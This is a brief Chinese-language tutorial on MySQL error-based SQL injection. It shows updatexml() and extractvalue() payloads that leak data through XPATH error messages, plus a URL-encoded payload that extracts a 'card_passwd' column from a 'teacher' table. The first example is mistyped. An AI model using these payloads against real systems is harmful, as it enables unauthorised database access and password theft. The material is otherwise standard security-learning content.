SQL-报错注入

报错注入在没办法使用union联合查询的时候使用，前提是不能过滤一些关键的函数

Updatexml()

select * from users where username='admin' and updatexml(1,concat(0x7e,(select ()user)),0x7e),1);

//回显
ERROR 1105(HY000): XPATH syntax error: '~root@localhost~'

可以看到，select uaer() 被成功查询，并将结果展示在了报错信息中，在MySQL中可以使用十六进制表示对应的字符串

Extractvalue()

extractvalue(1,concat(0x7e,(select user()),0x7e))

与updatexml()利用方法类似

截取回显

报错信息回显通常会有字符限制，长度超出的部分被丢去，我们可以使用substr函数进行一个截取，如下

extractvalue(0x0a,concat(0x0a,(select substr((select group_concat(card_passwd) from teacher),20))))%23

%23为URL编码中的#号

sqlmap

待更新...